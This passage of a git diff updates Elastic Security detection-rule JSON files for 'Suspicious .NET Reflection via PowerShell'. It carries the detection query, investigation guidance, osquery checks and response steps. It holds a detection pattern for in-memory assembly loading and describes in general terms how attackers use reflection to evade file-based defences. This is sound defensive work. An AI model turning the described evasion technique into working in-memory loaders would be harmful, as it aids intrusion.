suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load" @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_106.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_106.json index d350701aaed..afca31b4af3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_106.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious .NET Reflection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load" @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_107.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_107.json index 3d5f5340abb..b03b684109a 100644 --- a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_107.json +++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_107.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious .NET Reflection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load" @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_108.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_108.json index fa0f5006fe0..dbba1ffb1f4 100644 --- a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_108.json +++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_108.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious .NET Reflection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, 